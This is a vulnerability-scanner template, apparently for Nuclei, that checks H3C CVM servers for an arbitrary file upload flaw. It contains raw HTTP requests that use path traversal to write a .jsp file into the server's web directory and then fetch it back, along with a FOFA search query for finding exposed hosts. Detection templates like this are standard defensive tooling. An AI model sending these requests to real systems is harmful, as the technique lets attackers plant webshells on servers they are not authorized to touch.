51 lines
1.6 KiB
YAML
51 lines
1.6 KiB
YAML
id: h3c-cvm-arbitrary-file-upload
|
|
|
|
info:
|
|
name: H3C CVM - Arbitrary File Upload
|
|
author: SleepingBag945
|
|
severity: critical
|
|
description: |
|
|
An H3C CVM vulnerability allows for arbitrary file uploads. This enables attackers to upload any files they choose, acquire webshells, manipulate server permissions, and access sensitive information.
|
|
reference:
|
|
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/h3c-cvm-fileupload.yaml
|
|
- https://github.com/tr0uble-mAker/POC-bomber/blob/main/pocs/redteam/h3c_cvm_fileupload_2022.py
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
fofa-query: server="H3C-CVM"
|
|
tags: h3c,lfi,instrusive,file-upload,intrusive
|
|
variables:
|
|
filename: "{{rand_base(5)}}"
|
|
payload: "{{rand_base(8)}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/{{filename}}.jsp&name=222" HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-range: bytes 0-10/20
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
{{payload}}
|
|
- |
|
|
GET /cas/js/lib/buttons/{{filename}}.jsp HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- "{{payload}}"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "Content-Type: text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100afc1760cfa434e367bb33df7f5637dadba8e63aa69c0df3f897704c8ee24ade602200cd025b7689fc691584f540db3067bcbfcc557430f59d59d2b9b8f86b015b74c:922c64590222798bb761d5b6d8e72950
|